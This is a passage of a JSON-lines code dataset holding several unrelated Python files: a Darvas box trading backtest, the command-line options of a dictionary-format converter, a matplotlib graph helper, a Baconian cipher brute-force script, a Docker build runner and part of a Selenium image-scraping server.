clarity\n# fig.add_trace(go.Trace(\n# x=df.index,\n# y=df['close'],\n# line_color=\"black\",\n# line_width=1\n# ))\n\n# layout = go.Layout(\n# plot_bgcolor='#efefef',\n# showlegend=False,\n# # Font Families\n# font_family='Monospace',\n# font_color='#000000',\n# font_size=20,\n# xaxis=dict(\n# rangeslider=dict(\n# visible=False\n# ))\n# )\n\n# fig.update_layout(layout)\n# # Display plot in local browser window\n# fig.show()\n\n# Import libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport yfinance as yf\n\n# Define parameters\nstock = 'TSM' # Stock symbol or name\nstart_date = '2020-01-01' # Start date of the time range\nend_date = '2020-12-31' # End date of the time range\ninterval = '1d' # Interval of the data points\ncapital = 100000 # Initial capital\ntrade_amount = 0.1 # Trade amount or ratio\nheight_factor = 1.5 # Height factor for dynamic box height\nwidth_factor = 1.2 # Width factor for dynamic box width\nvolume_threshold = 2 # Volume threshold for buy or sell signals\n\n# Download data from Yahoo Finance\ndata = yf.download(stock, start=start_date, end=end_date, interval=interval)\ndata['Date'] = data.index # Add a Date column\n\n# Calculate the 20-day average volume\ndata['Avg_Volume'] = data['Volume'].rolling(20).mean()\n\n# Initialize variables\nbox_height = None # Box height\nbox_width = None # Box width\nbox_top = None # Box top\nbox_bottom = None # Box bottom\nposition = None # Position (long or short)\ntrade_price = None # Trade price\ntrade_volume = None # Trade volume\nbalance = capital # Balance\nprofit = 0 # Profit\nsignals = [] # List of signals (buy or sell)\ntrades = [] # List of trades (entry or exit)\n\n# Loop through the data\nfor i in range(len(data)):\n date = data['Date'][i] # Current date\n open_price = data['Open'][i] # Current open price\n high_price = data['High'][i] # Current high price\n low_price = data['Low'][i] # Current low price\n close_price = data['Close'][i] # Current close price\n volume = data['Volume'][i] # Current volume\n\n if box_height is None: # If no box height is set, use the first day's range as the initial box height\n box_height = high_price - low_price\n\n if box_width is None: # If no box width is set, use 1 as the initial box width\n box_width = 1\n\n if box_top is None: # If no box top is set, use the first day's high as the initial box top\n box_top = high_price\n\n if box_bottom is None: # If no box bottom is set, use the first day's low as the initial box bottom\n box_bottom = low_price\n\n if position is None: # If no position is set, use 'short' as the initial position\n position = 'short'\n\n signal = None # Initialize signal as None\n\n if position == 'short': # If in a short position, look for buy signals\n\n if volume > volume_threshold * data['Avg_Volume'][i]: # If volume exceeds the threshold\n\n if high_price > box_top: # If high price breaks above the box top\n\n signal = 'buy' # Generate a buy signal\n\n trade_price = max(open_price, box_top) # Set trade price as the maximum of open price and box top\n\n trade_volume = int(balance * trade_amount / trade_price) # Set trade volume as a fraction of balance\n\n balance -= trade_volume * trade_price # Deduct trade amount from balance\n\n position = 'long' # Switch to long position\n\n box_height *= height_factor # Update box height by multiplying with height factor\n\n box_width *= width_factor # Update box width by multiplying with width factor\n\n box_top += box_height # Update box top by adding box height\n\n box_bottom += 
box_height # Update box bottom by adding box height\n\n    elif position == 'long': # If in a long position, look for sell signals\n\n        if volume > volume_threshold * data['Avg_Volume'][i]: # If volume exceeds the threshold\n\n            if low_price < box_bottom: # If low price breaks below the box bottom\n\n                signal = 'sell' # Generate a sell signal\n\n                trade_price = min(open_price, box_bottom) # Set trade price as the minimum of open price and box bottom\n\n                # Sell the shares bought at the last entry: trade_volume still holds the\n                # entry volume, so it must NOT be recomputed from the cash balance here\n                balance += trade_volume * trade_price # Add the sale proceeds to balance\n\n                profit += trade_volume * (trade_price - trades[-1][2]) # Calculate profit from the last entry trade\n\n                position = 'short' # Switch to short position\n\n                box_height *= height_factor # Update box height by multiplying with height factor\n\n                box_width *= width_factor # Update box width by multiplying with width factor\n\n                box_top -= box_height # Update box top by subtracting box height\n\n                box_bottom -= box_height # Update box bottom by subtracting box height\n\n    if signal is not None: # If a signal is generated, record it in the signals list\n        signals.append((date, signal, trade_price, trade_volume))\n\n    if signal == 'buy': # If a buy signal is generated, record it as an entry trade in the trades list\n        trades.append((date, 'entry', trade_price, trade_volume))\n\n    if signal == 'sell': # If a sell signal is generated, record it as an exit trade in the trades list\n        trades.append((date, 'exit', trade_price, trade_volume))\n\n# Print results\nprint('Final balance:', balance)\nprint('Total profit:', profit)\nprint('Number of signals:', len(signals))\nprint('Number of trades:', len(trades))\n\n# Plot results\nplt.figure(figsize=(12, 8))\nplt.plot(data['Date'], data['Close'], label='Close Price')\nplt.plot(data['Date'], data['Avg_Volume'], label='Average Volume')\nfor signal in signals:\n    if signal[1] == 'buy':\n        plt.scatter(signal[0], signal[2], color='green', marker='^', label='Buy Signal')\n    elif signal[1] == 'sell':\n        plt.scatter(signal[0], signal[2], color='red', marker='v', label='Sell Signal')\nplt.legend()\nplt.title('Darvas Box Trading Strategy for ' + stock)\nplt.xlabel('Date')\nplt.ylabel('Price/Volume')\nplt.show()","repo_name":"Benson0802/futures_py","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":8352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30626200142","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nThis file contains command line constants and functions.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport datetime\nimport sys\n\nfrom penelope.utilities import get_uuid\nfrom penelope.utilities import print_error\n\n__author__ = \"Alberto Pettarin\"\n__copyright__ = \"Copyright 2012-2016, Alberto Pettarin (www.albertopettarin.it)\"\n__license__ = \"MIT\"\n__version__ = \"3.1.3\"\n__email__ = \"alberto@albertopettarin.it\"\n__status__ = \"Production\"\n\nINPUT_FORMATS = [\n    \"bookeen\",\n    \"csv\",\n    \"kobo\",\n    \"stardict\",\n    \"xml\"\n]\n\nOUTPUT_FORMATS = [\n    \"bookeen\",\n    \"csv\",\n    \"epub\",\n    \"kobo\",\n    \"mobi\",\n    \"stardict\",\n    \"xml\"\n]\n\nCOMMAND_LINE_PARAMETERS = [\n    {\n        \"short\": \"-d\",\n        \"long\": \"--debug\",\n        \"help\": \"enable debug mode (default: False)\",\n        \"action\": \"store_true\"\n    },\n    {\n        \"short\": \"-f\",\n        \"long\": \"--language-from\",\n        \"help\": \"from language (ISO 639-1 code)\",\n        \"action\": \"store\"\n    },\n    {\n        \"short\": 
\"short\": \"-i\",\n \"long\": \"--input-file\",\n \"help\": \"input file name prefix(es). Multiple prefixes must be comma-separated.\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-j\",\n \"long\": \"--input-format\",\n \"help\": \"from format (values: %s)\" % \"|\".join(INPUT_FORMATS),\n \"action\": \"store\"\n },\n {\n \"short\": \"-k\",\n \"long\": \"--keep\",\n \"help\": \"keep temporary files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": \"-o\",\n \"long\": \"--output-file\",\n \"help\": \"output file name\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-p\",\n \"long\": \"--output-format\",\n \"help\": \"to format (values: %s)\" % \"|\".join(OUTPUT_FORMATS),\n \"action\": \"store\"\n },\n {\n \"short\": \"-t\",\n \"long\": \"--language-to\",\n \"help\": \"to language (ISO 639-1 code)\",\n \"action\": \"store\"\n },\n {\n \"short\": \"-v\",\n \"long\": \"--version\",\n \"help\": \"print version and exit\",\n \"action\": \"store_true\"\n },\n\n {\n \"short\": None,\n \"long\": \"--author\",\n \"help\": \"author string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--copyright\",\n \"help\": \"copyright string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--cover-path\",\n \"help\": \"path of the cover image file\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--description\",\n \"help\": \"description string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--email\",\n \"help\": \"email string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--identifier\",\n \"help\": \"identifier string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--license\",\n \"help\": \"license string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--title\",\n \"help\": \"title string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--website\",\n \"help\": \"website string\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--year\",\n \"help\": \"year string\",\n \"action\": \"store\"\n },\n\n {\n \"short\": None,\n \"long\": \"--apply-css\",\n \"help\": \"apply the given CSS file (epub and mobi output only)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--bookeen-collation-function\",\n \"help\": \"use the specified collation function\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--bookeen-install-file\",\n \"help\": \"create *.install file (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-fs\",\n \"help\": \"CSV field separator (default: ',')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-ignore-first-line\",\n \"help\": \"ignore the first line of the input CSV file(s) (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--csv-ls\",\n \"help\": \"CSV line separator (default: '\\\\n')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--dictzip-path\",\n \"help\": \"path to dictzip executable\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--epub-no-compress\",\n \"help\": \"do not create the compressed container (epub output only, default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--escape-strings\",\n \"help\": \"escape HTML strings (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--flatten-synonyms\",\n \"help\": 
\"flatten synonyms, creating a new entry with headword=synonym and using the definition of the original headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-function\",\n \"help\": \"compute the prefix of headwords using the given prefix function file\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-length\",\n \"help\": \"group headwords by prefix of given length (default: 2)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-merge-across-first\",\n \"help\": \"merge headword groups even when the first character changes (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--group-by-prefix-merge-min-size\",\n \"help\": \"merge headword groups until the given minimum number of headwords is reached (default: 0, meaning no merge will take place)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--ignore-case\",\n \"help\": \"ignore headword case, all headwords will be lowercased (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--ignore-synonyms\",\n \"help\": \"ignore synonyms, not reading/writing them if present (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--include-index-page\",\n \"help\": \"include an index page (epub and mobi output only, default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--input-file-encoding\",\n \"help\": \"use the specified encoding for reading the raw contents of input file(s) (default: 'utf-8')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--input-parser\",\n \"help\": \"use the specified parser function after reading the raw contents of input file(s)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--kindlegen-path\",\n \"help\": \"path to kindlegen executable\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--marisa-bin-path\",\n \"help\": \"path to MARISA bin directory\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--marisa-index-size\",\n \"help\": \"maximum size of the MARISA index (default: 1000000)\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--merge-definitions\",\n \"help\": \"merge definitions for the same headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--merge-separator\",\n \"help\": \"add this string between merged definitions (default: ' | ')\",\n \"action\": \"store\"\n },\n {\n \"short\": None,\n \"long\": \"--mobi-no-kindlegen\",\n \"help\": \"do not run kindlegen, keep .opf and .html files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--no-definitions\",\n \"help\": \"do not output definitions for EPUB and MOBI formats (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sd-ignore-sametypesequence\",\n \"help\": \"ignore the value of sametypesequence in StarDict .ifo files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sd-no-dictzip\",\n \"help\": \"do not compress the .dict file in StarDict files (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-after\",\n \"help\": \"sort after merging/flattening (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": 
\"--sort-before\",\n \"help\": \"sort before merging/flattening (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-by-definition\",\n \"help\": \"sort by definition (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-by-headword\",\n \"help\": \"sort by headword (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-ignore-case\",\n \"help\": \"ignore case when sorting (default: False)\",\n \"action\": \"store_true\"\n },\n {\n \"short\": None,\n \"long\": \"--sort-reverse\",\n \"help\": \"reverse the sort order (default: False)\",\n \"action\": \"store_true\"\n },\n]\n\nREQUIRED_PARAMETERS = [\n \"input_file\",\n \"input_format\",\n \"language_from\",\n \"language_to\",\n \"output_format\",\n \"output_file\"\n]\n\nEXAMPLES = [\n # {\n # \"options\": \"-h\",\n # \"description\": \"Print this message and exit\"\n # },\n # {\n # \"options\": \"-v\",\n # \"description\": \"Print the version and exit\"\n # },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p stardict -o output.zip\",\n \"description\": \"Convert en->it dictionary dict.csv (in CSV format) into output.zip (in StarDict format)\"\n },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p stardict -o output.zip --merge-definitions\",\n \"description\": \"As above, but also merge definitions\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword\",\n \"description\": \"Merge CSV dictionaries d1, d2, and d3 into output.csv, sorting by headword\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword --sort-ignore-case\",\n \"description\": \"As above, but ignore case for sorting\"\n },\n {\n \"options\": \"-i d1,d2,d3 -j csv -f en -t it -p csv -o output.csv --sort-after --sort-by-headword --sort-reverse\",\n \"description\": \"As above, but reverse the order\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv\",\n \"description\": \"Convert en->it dictionary dict.zip (in StarDict format) into output.csv (in CSV format)\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv --ignore-synonyms\",\n \"description\": \"As above, but do not read the .syn synonym file if present\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p csv -o output.csv --flatten-synonyms\",\n \"description\": \"As above, but flatten synonyms\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p bookeen -o output\",\n \"description\": \"Convert dict.zip into output.dict.idx and output.dict for Bookeen devices\"\n },\n {\n \"options\": \"-i dict.zip -j stardict -f en -t it -p kobo -o dicthtml-en-it\",\n \"description\": \"Convert dict.zip into dicthtml-en-it.zip for Kobo devices\"\n },\n {\n \"options\": \"-i dict.csv -j csv -f en -t it -p mobi -o output.mobi --cover-path mycover.png --title \\\"My English->Italian Dictionary\\\"\",\n \"description\": \"Convert dict.csv into a MOBI (Kindle) dictionary, using the specified cover image and title\"\n },\n {\n \"options\": \"-i dict.xml -j xml -f en -t it -p mobi -o output.epub\",\n \"description\": \"Convert dict.xml into an EPUB dictionary\"\n },\n {\n \"options\": \"-i dict.xml -j xml -f en -t it -p mobi -o output.epub --epub-output-definitions\",\n \"description\": \"As above, but also output definitions\"\n },\n]\n\nUSAGE = u\"\"\"\n $ penelope -h\n $ penelope -i INPUT_FILE 
-j INPUT_FORMAT -f LANGUAGE_FROM -t LANGUAGE_TO -p OUTPUT_FORMAT -o OUTPUT_FILE [OPTIONS]\n $ penelope -i IN1,IN2[,IN3...] -j INPUT_FORMAT -f LANGUAGE_FROM -t LANGUAGE_TO -p OUTPUT_FORMAT -o OUTPUT_FILE [OPTIONS]\n\"\"\"\n\nDESCRIPTION = u\"\"\"description:\n Convert dictionary file(s) with file name prefix INPUT_FILE from format INPUT_FORMAT to format OUTPUT_FORMAT, saving it as OUTPUT_FILE.\n The dictionary is from LANGUAGE_FROM to LANGUAGE_TO, possibly the same.\n You can merge several dictionaries (with the same format), by providing a list of comma-separated prefixes, as shown by the third synopsis above.\"\"\"\n\nEPILOG = u\"examples:\\n\"\nfor example in EXAMPLES:\n EPILOG += u\"\\n\"\n EPILOG += u\" $ penelope %s\\n\" % (example[\"options\"])\n EPILOG += u\" %s\\n\" % (example[\"description\"])\nEPILOG += u\" \\n\"\n\n\ndef check_arguments(args):\n \"\"\"\n Check that we have all the required command line arguments,\n and that the input/output format values are supported.\n \"\"\"\n for required in REQUIRED_PARAMETERS:\n if required not in args:\n print_error(\"Argument '%s' is required\" % required)\n sys.exit(2)\n if args.input_format not in INPUT_FORMATS:\n print_error(\"Format '%s' is not a valid input format\" % args.input_format)\n print_error(\"Valid input formats: %s\" % INPUT_FORMATS)\n sys.exit(4)\n if args.output_format not in OUTPUT_FORMATS:\n print_error(\"Format '%s' is not a valid output format\" % args.output_format)\n print_error(\"Valid output formats: %s\" % OUTPUT_FORMATS)\n sys.exit(4)\n\n\ndef set_default_values(args):\n def set_default_value(key, value):\n if not args.__contains__(key):\n args.__dict__[key] = value\n set_default_value(\"apply_css\", None)\n set_default_value(\"bookeen_collation_function\", None)\n set_default_value(\"bookeen_install_file\", False)\n set_default_value(\"csv_fs\", \",\")\n set_default_value(\"csv_ignore_first_line\", False)\n set_default_value(\"csv_ls\", \"\\n\")\n set_default_value(\"debug\", False)\n set_default_value(\"dictzip_path\", None)\n set_default_value(\"epub_no_compress\", False)\n set_default_value(\"escape_strings\", False)\n set_default_value(\"flatten_synonyms\", False)\n set_default_value(\"group_by_prefix_length\", 2)\n set_default_value(\"group_by_prefix_function\", None)\n set_default_value(\"group_by_prefix_merge_across_first\", False)\n set_default_value(\"group_by_prefix_merge_min_size\", 0)\n set_default_value(\"ignore_case\", False)\n set_default_value(\"ignore_synonyms\", False)\n set_default_value(\"include_index_page\", False)\n set_default_value(\"input_file_encoding\", \"utf-8\")\n set_default_value(\"input_parser\", None)\n set_default_value(\"keep\", False)\n set_default_value(\"kindlegen_path\", None)\n set_default_value(\"marisa_bin_path\", None)\n set_default_value(\"marisa_index_size\", 1000000)\n set_default_value(\"merge_definitions\", False)\n set_default_value(\"merge_separator\", \" | \")\n set_default_value(\"mobi_no_kindlegen\", False)\n set_default_value(\"no_definitions\", False)\n set_default_value(\"sd_ignore_sametypesequence\", False)\n set_default_value(\"sd_no_dictzip\", False)\n set_default_value(\"sort_after\", False)\n set_default_value(\"sort_before\", False)\n set_default_value(\"sort_by_definition\", False)\n set_default_value(\"sort_by_headword\", False)\n set_default_value(\"sort_ignore_case\", False)\n set_default_value(\"sort_reverse\", False)\n set_default_value(\"version\", False)\n set_default_value(\"author\", u\"Penelope\")\n set_default_value(\"copyright\", 
u\"GNU GPL v3\")\n    set_default_value(\"cover_path\", None)\n    set_default_value(\"description\", u\"Dictionary %s to %s\" % (args.language_from, args.language_to))\n    set_default_value(\"email\", u\"penelopedictionaryconverter@gmail.com\")\n    set_default_value(\"identifier\", get_uuid())\n    set_default_value(\"license\", u\"GNU GPL v3\")\n    set_default_value(\"title\", u\"Dictionary %s to %s\" % (args.language_from, args.language_to))\n    set_default_value(\"website\", u\"https://goo.gl/EB5XSR\")\n    set_default_value(\"year\", str(datetime.datetime.now().year))\n","repo_name":"pettarin/penelope","sub_path":"penelope/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"53"} +{"seq_id":"38293587784","text":"'''\nCreated on May 04, 2019\n\n@author: dulan\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path as osp\nimport os\n\nclass Graph(object):\n    def __init__(self, save_loc='output', filename='untitled'):\n        self.save_loc = save_loc\n        if not osp.exists(self.save_loc):\n            os.makedirs(self.save_loc)\n        self.set_filename(filename)  # set_filename returns None, so assigning its result here would wipe the path\n        self.ylabel = ''\n        self.ylabel_2 = ''\n        self.xlabel = ''\n        self.title = ''\n        self.legend_1 = None\n        self.legend_2 = None\n        self.legend_3 = None\n\n    def set_filename(self, filename):\n        # the '.png' extension is appended by the plot methods, so adding it\n        # here as well produced names like 'untitled.png.png'\n        self.filename = osp.join(self.save_loc, filename)\n\n    def set_labels(self, title, xlabel, ylabel_1, ylabel_2=''):\n        self.title = title\n        self.xlabel = xlabel\n        self.ylabel = ylabel_1\n        self.ylabel_2 = ylabel_2\n\n    def set_legends(self, legend_1, legend_2, legend_3):\n        self.legend_1 = legend_1\n        self.legend_2 = legend_2\n        self.legend_3 = legend_3\n\n    def set_names(self):\n        plt.xlabel(self.xlabel)\n        plt.ylabel(self.ylabel)\n        plt.title(self.title)\n\n    def plot(self, a_list, filename=None):\n        self.set_names()\n        plt.plot(a_list)\n        if filename is not None:\n            self.set_filename(filename)\n        if self.legend_1 is not None:\n            plt.gca().legend([self.legend_1])  # legend() expects a sequence; bare parentheses do not make a tuple\n        plt.savefig(self.filename + '.png')\n        plt.clf()\n\n    def plot_xy(self, x_list, y_list, filename=None):\n        self.set_names()\n        plt.plot(y_list, x_list)\n        if filename is not None:\n            self.set_filename(filename)\n        plt.savefig(self.filename + '.png')\n        plt.clf()\n\n    def plot_2(self, a_list, b_list, filename=None):\n        self.set_names()\n        plt.plot(a_list)\n        plt.plot(b_list)\n        if self.legend_1 is not None and self.legend_2 is not None:\n            plt.gca().legend((self.legend_1, self.legend_2))\n        if filename is not None:\n            self.set_filename(filename)\n        plt.savefig(self.filename + '.png')\n        plt.clf()\n\n    def plot_2sub(self, a_list, b_list, filename=None):\n        self.set_names()\n        fig, ax1 = plt.subplots()\n\n        color = 'tab:red'\n        ax1.set_title(self.title)\n        ax1.set_xlabel(self.xlabel)\n        ax1.set_ylabel(self.ylabel, 
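# tint the left axis label to match the first series\n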
color=color)\n        ax1.plot(a_list, color=color, label=self.legend_1)\n        ax1.tick_params(axis='y', labelcolor=color)\n\n        color = 'tab:blue'\n        ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis\n        ax2.set_ylabel(self.ylabel_2, color=color)  # we already handled the x-label with ax1\n        ax2.plot(b_list, color=color, label=self.legend_2)\n        ax2.tick_params(axis='y', labelcolor=color)\n\n        fig.tight_layout()\n\n        if filename is not None:\n            self.set_filename(filename)\n        plt.savefig(self.filename + '.png')\n        plt.clf()\n\n    def plot_3sub(self, a_list, b_list, c_list, filename=None):\n        self.set_names()\n        fig, ax1 = plt.subplots()\n\n        color = 'tab:red'\n        ax1.set_title(self.title)\n        ax1.set_xlabel(self.xlabel)\n        ax1.set_ylabel(self.ylabel, color=color)\n        ax1.plot(a_list, color=color, label=self.legend_1)\n        ax1.tick_params(axis='y', labelcolor=color)\n\n        color = 'tab:blue'\n        ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis\n        ax2.set_ylabel(self.ylabel_2)  # we already handled the x-label with ax1\n        ax2.plot(b_list, color=color, label=self.legend_2)\n        # ax2.tick_params(axis='y', labelcolor=color)\n\n        color = 'tab:green'\n        ax2.plot(c_list, color=color, label=self.legend_3)\n\n        fig.tight_layout()\n        ax1.legend()\n        ax2.legend()\n\n        if filename is not None:\n            self.set_filename(filename)\n        plt.savefig(self.filename + '.png')\n        plt.clf()\n\n\nif __name__ == '__main__':\n    gr_obj = Graph('hello3')  # note: the first positional argument is save_loc, not the file name\n    # gr_obj.set_labels('this is title', 'x label', 'y label')\n    # gr_obj.set_legends('legend 1', 'legend_2', 'legend_3')\n    # gr_obj.plot_3sub([1, 2, 3], [10, 25, 30], [5, 35, 30])\n\n    list1 = [1, 0.5, 0.4]\n    list2 = [0.5, 0.7, 0.78]\n    list3 = [0.5, 0.69, 0.75]\n    gr_obj.set_labels('main', 'label1', 'label2', 'label3')\n    gr_obj.set_legends('main', 'label1', 'label2')\n    gr_obj.plot_3sub(list1, list2, list3, 'plot-xy')\n","repo_name":"CodeProcessor/MyLib","sub_path":"mylib/ml/graphs/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39382429798","text":"import string\nfrom itertools import zip_longest\n\nciphertext_old = \"001010111001001001110110100001\"\nciphertext = \"1001001101101001010110100101011010101101001001011001001001100110011011001010\"\nciphertext_new = ciphertext.replace(\"0\", \"2\").replace(\"1\", \"0\").replace(\"2\", \"1\")\nfor i in zip_longest(*[iter(ciphertext_new)]*5, fillvalue=\"\"):\n    i = int(\"\".join(i), 2)\n    print(string.ascii_lowercase[i-1], end=\"\")\n\nciphertext2 = ciphertext.replace(\"0\", \"-\").replace(\"1\", \".\")\nciphertext3 = ciphertext.replace(\"0\", \".\").replace(\"1\", \"-\")\nciphertext4 = ciphertext[::-1].replace(\"0\", \"-\").replace(\"1\", \".\")\nciphertext5 = ciphertext[::-1].replace(\"0\", \".\").replace(\"1\", \"-\")\nprint(ciphertext2)\nprint(ciphertext3)\nprint(ciphertext4)\nprint(ciphertext5)\n","repo_name":"sidharthmrao/Cryptography_DS","sub_path":"misc/scientia_potentia_est/baconian_brute.py","file_name":"baconian_brute.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10401997288","text":"#!/usr/bin/python3\n\nimport os, shutil, subprocess, sys\n\nbranch = 'hardknott'\n\nprint('python run-docker.py with Branch ', branch)\nprint('==========================================')\nmy_env = os.environ.copy()\nif sys.platform.startswith('win'):  # is win\n    cwd = os.getcwd().replace('\\\\', '/')\nelse:  # is linux:\n    cwd = os.getcwd()\n\nimage = 'openvario/' + branch + ':latest'\n\nprint(' Path-Variable is: ', cwd, '!!!!!!!!!!!!!!')\n\ndockerfile = 'scripts/Dockerfile'\n\n# test image detection\nout = open('docker-out.txt', 'w')\nmyprocess = subprocess.Popen(['docker', 'image', 'ls', '-q', image], env=my_env, cwd=cwd, stdout=out, shell=False)\nmyprocess.wait()\nout.close()\n\nout = open('docker-out.txt', 'r')\nimage_id = out.read()\nout.close()\n\nprint('image: ', image, ', image-id = ', image_id, ' --- ', len(image_id))\n\nif len(image_id) == 0:  # build the image only when it is not present yet\n    myprocess = subprocess.Popen(['docker', 'build', '--file', dockerfile, '-t', image, './'], env=my_env, cwd=cwd, shell=False)\n    myprocess.wait()\n\ntarget_dir = '/opt/openvario'\nif sys.platform.startswith('win'):\n    # is win, but this is very preliminary\n    target_dir = '/home/pokyuser'  # overwrite previous!\n    # myprocess = subprocess.Popen(['docker', 'run', '-u \"pokyuser\"' , '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n    # myprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source='+ cwd + ',target=' + target_dir, '-it', image\n    myprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source=' + cwd + ',target=' + target_dir, '-it', image\n        , './build-image.py'], env=my_env, cwd=cwd, shell=False)\n    # , '/opt/openvario/build-image.py' ], env = my_env, cwd = cwd, shell = False)\n# on linux nothing extra is needed here: the image was already built above when\n# missing (the old \"if with_docker_build:\" re-build referenced a variable that\n# was never defined and raised a NameError)\n\nmyprocess = subprocess.Popen(['docker', 'run', '--rm', '--mount', 'type=bind,source=' + cwd + ',target=' + target_dir, '-it', image\n    , '--workdir=' + target_dir], env=my_env, cwd=cwd, shell=False)\nmyprocess.wait()\n\nprint('Finish: run-docker.py')\n","repo_name":"August2111/OpenVario0","sub_path":"run-docker.py","file_name":"run-docker.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6007812355","text":"import numpy\nimport base64\nimport threading\nfrom bottle import *\nfrom PIL import Image\nfrom io import BytesIO\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndef image_to_data(image):\n    pb = numpy.array(image.convert('RGB')).astype('uint16')\n    color = ((pb[:,:,2] >> 3) << 11) | ((pb[:,:,1] >> 2) << 5) | (pb[:,:,0] >> 3)\n    return bytes(numpy.dstack(((color >> 8) & 0xFF, color & 0xFF)).flatten().tolist())\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('headless')\nchrome = webdriver.Chrome(chrome_options=options)\n\ntry:\n    wait = WebDriverWait(chrome, 60*5)\n\n    chrome.get('http://make.girls.moe')\n\n    btn = chrome.find_element_by_css_selector('.generator > button')\n\n    print('Loading model...')\n    wait.until(lambda _: btn.is_enabled())\n    print('Done')\n    btn.click()\n    wait.until(lambda _: btn.is_enabled())\n    img = chrome.find_element_by_css_selector('.result-canvas > img')\n\n    moes = []\n\n    loading = False\n\n    @get('/tft')\n    def get_moe():\n        while not moes: pass\n        moe = moes.pop()\n        print(len(moes))\n        if not loading: threading.Thread(None, gen_moes).start()\n        return image_to_data(Image.open(BytesIO(moe)))\n\n    @get('/png')\n    def get_png():\n        response.content_type = 'image/png'\n        while not moes: pass\n        moe = moes.pop()\n   